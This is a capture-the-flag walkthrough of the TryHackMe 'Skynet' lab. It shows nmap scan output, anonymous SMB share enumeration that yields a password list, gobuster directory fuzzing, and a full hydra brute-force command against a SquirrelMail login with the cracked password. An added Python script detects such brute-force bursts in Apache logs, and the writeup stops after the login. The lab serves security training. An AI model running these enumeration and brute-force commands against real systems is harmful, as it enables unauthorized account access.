https://tryhackme.com/room/skynet
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA RESP-CODES SASL UIDL PIPELINING TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS ENABLE have ID IMAP4rev1 post-login OK LITERAL+ listed Pre-login capabilities SASL-IR LOGINDISABLEDA0001 IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-07-13T04:18:06
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-07-12T23:18:06-05:00
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient -L ////10.10.244.1//
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
First we tried to smbclient into the anonymous share using the anonymous user to get a glimpse
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient \\\\10.10.244.1\\anonymous -U anonymous
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \> get attention.txt
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
smb: \> get log1.txt
Now we have attention.txt and log1.txt; the others are all blank files with 0 bytes
┌──(kali㉿VirtualBox)-[~]
└─$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
┌──(kali㉿VirtualBox)-[~]
└─$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
We got the username milesdyson and a list of passwords. Now we need to find somewhere to brute force. I tried SMB, but that is not the place, so I used gobuster to fuzz the directories
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 10.10.244.1 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/admin (Status: 301) [Size: 310] [--> http://10.10.244.1/admin/]
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/config (Status: 301) [Size: 311] [--> http://10.10.244.1/config/]
/css (Status: 301) [Size: 308] [--> http://10.10.244.1/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 307] [--> http://10.10.244.1/js/]
/server-status (Status: 403) [Size: 276]
/squirrelmail (Status: 301) [Size: 317] [--> http://10.10.244.1/squirrelmail/]
The /squirrelmail looks sus
On the Inspect > Network tab we found the parameters we wanted for the brute force
Now we will be using hydra to fill in the parameters
┌──(kali㉿VirtualBox)-[~]
└─$ hydra -l milesdyson -P log1.txt 10.10.244.1 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^:Unknown user or password incorrect."
[80][http-post-form] host: 10.10.244.1 login: milesdyson password: cyborg007haloterminator
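Seen from the server side, the hydra run above is a burst of POSTs to /squirrelmail/src/redirect.php from a single address. The following detection sketch is an added example, not part of the original writeup: it assumes Apache combined log format and that a 302 from redirect.php means an accepted login, and its threshold, window and log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/squirrelmail/src/redirect.php"  # login handler targeted in the writeup
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return per-IP stats for sources that sent >= threshold login POSTs within window."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    stats = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        s = stats.setdefault(m["ip"], {"posts": 0, "burst": False, "accepted_login": False})
        s["posts"] += 1
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:          # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            s["burst"] = True
        if m["status"] == "302":           # assumption: redirect = credentials accepted
            s["accepted_login"] = True
    # Only report sources that bursted; accepted_login marks accounts to reset first
    return {ip: s for ip, s in stats.items() if s["burst"]}

def sample_log():
    """Constructed access-log lines (documentation IP ranges), not from the target."""
    fmt = '{ip} - - [13/Jul/2022:04:30:{s:02d} +0000] "{m} {p} HTTP/1.1" {st} 512 "-" "-"'
    lines = [fmt.format(ip="192.0.2.10", s=s, m="POST", p=LOGIN_PATH, st=200)
             for s in range(11)]
    lines.append(fmt.format(ip="192.0.2.10", s=11, m="POST", p=LOGIN_PATH, st=302))
    # A normal user: one login followed by a mailbox page load
    lines.append(fmt.format(ip="198.51.100.7", s=20, m="POST", p=LOGIN_PATH, st=302))
    lines.append(fmt.format(ip="198.51.100.7", s=21, m="GET",
                            p="/squirrelmail/src/webmail.php", st=200))
    return lines

if __name__ == "__main__":
    for ip, s in find_bruteforce(sample_log()).items():
        print(ip, s)
```

A flagged source with accepted_login set is the case to triage first, since it means the guessing ended with a working mailbox password.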
After login, we found some emails